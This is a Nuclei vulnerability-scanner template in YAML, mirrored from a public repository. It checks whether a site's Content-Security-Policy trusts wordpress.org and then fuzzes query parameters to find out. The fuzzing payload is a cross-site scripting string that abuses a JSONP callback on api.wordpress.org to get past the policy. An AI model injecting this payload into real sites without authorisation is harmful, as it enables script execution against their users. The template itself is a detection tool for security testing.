mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-18 08:33:47 +08:00
55 lines
1.3 KiB
YAML
55 lines
1.3 KiB
YAML
id: wordpress-api-csp-bypass
|
|
|
|
info:
|
|
name: Content-Security-Policy Bypass - WordPress API
|
|
author: renniepak,DhiyaneshDK
|
|
severity: medium
|
|
reference:
|
|
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
|
|
metadata:
|
|
verified: true
|
|
tags: xss,csp-bypass,wordpress-api
|
|
|
|
flow: http(1) && headless(1)
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "Content-Security-Policy"
|
|
- "wordpress.org"
|
|
condition: and
|
|
internal: true
|
|
|
|
headless:
|
|
- steps:
|
|
- action: navigate
|
|
args:
|
|
url: "{{BaseURL}}"
|
|
|
|
- action: waitdialog
|
|
name: wordpress_api_csp_xss
|
|
args:
|
|
max-duration: 5s
|
|
|
|
payloads:
|
|
injection:
|
|
- '<script src="https://api.wordpress.org/stats/plugin/1.0/?slug=x&callback=alert"></script>'
|
|
|
|
fuzzing:
|
|
- part: query
|
|
type: replace
|
|
mode: single
|
|
fuzz:
|
|
- "{{url_encode(injection)}}"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "wordpress_api_csp_xss == true"
|
|
# digest: 490a00463044022041ad93929a92f38cfbde6dc0c5720c64918ec66ef58120549fa858660ecf8b14022010e2431d5dda68c549be8128d4ed75490ea803461150bbf683285a00ab691df7:922c64590222798bb761d5b6d8e72950 |